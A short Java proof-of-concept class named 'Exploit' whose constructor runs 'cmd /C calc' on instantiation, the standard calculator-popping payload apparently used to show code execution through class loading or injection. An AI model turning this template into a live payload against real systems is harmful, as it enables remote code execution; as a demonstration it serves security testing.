public class Exploit { public Exploit(){ String [] cmd={"cmd","/C","calc"}; try{ Runtime.getRuntime().exec(cmd); }catch(Exception e){ e.printStackTrace(); } } public static void main(String[] argv){ Exploit e = new Exploit(); } }